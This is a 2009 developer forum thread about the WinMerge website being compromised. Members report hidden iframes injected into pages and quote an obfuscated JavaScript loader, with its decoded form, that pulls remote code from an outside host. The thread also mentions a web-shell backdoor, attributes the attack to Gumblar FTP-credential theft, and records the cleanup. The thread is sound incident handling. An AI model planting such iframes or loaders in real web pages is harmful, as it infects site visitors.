winmerge.org webpages was COMPROMISED!

Main development forum.

winmerge.org webpages was COMPROMISED!

Postby gerundt » Wed Apr 15, 2009 8:42 pm

Christian, Dean and I got today a not so nice mail:
Arjen Kaldenbach wrote:Hi,

My eset AV popped up when i visited the winmerge homepage minutes ago.
It seems some hidden iframes are injected, for example on the homepage:

</html>

<iframe src="http://betbigwager.cn/in.cgi?income61" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://betbigwager.cn/in.cgi?income62" width=1 height=1 style="visibility: hidden"></iframe>

I googled around, I read something like it could be a virust/trojan taking over a ftp client? see: http://lip-service.joygoround.com/?p=129

Sincerely,

Arjen Kaldenbach


Unfortunately was Arjen right and I found 13 compromised index.(php|html) files. :(

  • index.php
  • about\index.php
  • about\screenshots\index.php
  • docs\old\manual-2.6\index.html
  • docs\old\manual-2.8\index.html
  • docs\old\usersguide-1.7\index.html
  • docs\old\usersguide-2.0\index.html
  • downloads\index.php
  • support\index.php
  • translations\index.php
  • Wiki\index.php
  • Wiki\config\index.php
  • Wiki\extensions\SyntaxHighlight_GeSHi\geshi\docs\api\index.html

I think also, that some virus/trojan taking over a ftp client from us:
http://www.sulumitsretsambew.org/iframe-worms/

I checked my PC but I don't find something. Other websites, I managed, have no iframes. So I hope, I am not the infected user. :shock:

My FTP client said, the most index files was changed at "2009-04-14 15:46". The ftp log files something about "[14/Apr/2009:08:38:40 -0500]".

Can you check your PCs?
gerundt
Site Admin
 
Posts: 193
Joined: Wed Sep 24, 2008 8:47 am
Location: Germany

Re: winmerge.org webpages was COMPROMISED!

Postby kimmov » Wed Apr 15, 2009 9:44 pm

I use NOD32 virus checker and no viruses/troijans found.
kimmov
 
Posts: 562
Joined: Thu Sep 11, 2008 8:51 pm
Location: Finland

Re: winmerge.org webpages was COMPROMISED!

Postby merk » Wed Apr 22, 2009 2:07 am

My AV (avast) is reporting a virus when i try to go the manual page. HTML:Iframe-inf
merk
 
Posts: 3
Joined: Tue Apr 07, 2009 6:11 pm

Re: winmerge.org webpages was COMPROMISED!

Postby arinlares » Sun Apr 26, 2009 8:33 am

I got a warning using Avast today, and was told by somebody else using Dr. Web after running the url through the program.
arinlares
 
Posts: 3
Joined: Sun Apr 26, 2009 12:48 am

Re: winmerge.org webpages was COMPROMISED!

Postby kimmov » Mon Apr 27, 2009 1:55 pm

I've rebuild the manual and uploaded clean files to WinMerge.org.
kimmov
 
Posts: 562
Joined: Thu Sep 11, 2008 8:51 pm
Location: Finland

Re: winmerge.org webpages was COMPROMISED!

Postby arinlares » Tue Apr 28, 2009 11:31 pm

Cool. I went to the Manual, and it was clean. Thank you.
arinlares
 
Posts: 3
Joined: Sun Apr 26, 2009 12:48 am

Re: winmerge.org webpages was COMPROMISED!

Postby noxwizard979 » Sun May 17, 2009 3:25 am

It appears to have happened again. This has been inserted before the <body> tag:
Code: Select all
<script language=javascript><!--
(function(Q08g){var v9y1='%';eval(unescape((',76,61r,20a,3d,22Script,45n,67,69,6e,65,22,2cb,3d,22,56,65rsi,6fn()+,22,2cj,3d,22,22,2cu,3dnav,69gator,2euse,72Ag,65nt,3bif((u,2eindexOf(,22Chro,6de,22),3c0),26,26(u,2einde,78Of(,22,57in,22),3e0,29,26,26(u,2ei,6edexO,66,28,22NT,20,36,22),3c0),26,26(do,63,75ment,2ecookie,2ei,6e,64exOf(,22mi,65k,3d1,22),3c0),26,26,28,74,79p,65o,66,28zrv,7ats),21,3dtypeo,66(,22,41,22),29),7bzrv,7ats,3d,22A,22,3b,65val(,22if(window,2e,22+,61+,22),6a,3dj,2b,22,2ba+,22Majo,72,22,2bb+,61+,22,4d,69n,6fr,22+b+a+,22Build,22+,62+,22j,3b,22),3bdo,63ument,2ewrite,28,22,3cscript,20src,3d,2f,2fm,22+,22,61rtu,7a,2ecn,2fvid,2f,3fi,64,3d,22+,6a+,22,3e,3c,5c,2f,73cript,3e,22),3b,7d').replace(Q08g,v9y1)))})(/\,/g);
 --></script>

which becomes:
Code: Select all
eval('var a="Script-ngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>");}');


At the end of the page, this has also been inserted:
Code: Select all
<iframe src="http://findbigbearproperty.cn:8080/ts/in.cgi?pepsi9" width=2 height=4 style="visibility: hidden"></iframe>
noxwizard979
 
Posts: 2
Joined: Sun May 17, 2009 3:17 am

Re: winmerge.org webpages was COMPROMISED!

Postby gerundt » Sun May 17, 2009 4:41 pm

Ok, I clean (hopefully) all infected files (again)! And I also found a "PHP/C99Shell.CB" backdoor at the website and delete it!
gerundt
Site Admin
 
Posts: 193
Joined: Wed Sep 24, 2008 8:47 am
Location: Germany

Re: winmerge.org webpages was COMPROMISED!

Postby noxwizard979 » Mon May 18, 2009 6:02 pm

I don't know if you've looked into this any, but the script that affected your site is a new version of Gumblar.
http://blog.unmaskparasites.com/2009/05 ... r-exploit/

It travels in the same way and affects files in the same manner as well. It appears to get installed to the client's machine as spyware and then grabs your FTP credentials to make the changes to the files.
noxwizard979
 
Posts: 2
Joined: Sun May 17, 2009 3:17 am

Re: winmerge.org webpages was COMPROMISED!

Postby kimmov » Mon May 18, 2009 7:17 pm

I haven't read much about the subject myself - shorly something when the infection happened for a first time.

During the weekend there was some private mail discussion between few developers and all FTP passwords were changed. So hopefully we are safe now. Of course this should not have happened at all.

I'm hoping WinSCP + SFTP is still safe combination.. :geek:
kimmov
 
Posts: 562
Joined: Thu Sep 11, 2008 8:51 pm
Location: Finland

Next

Return to Developers

Who is online

Users browsing this forum: No registered users and 1 guest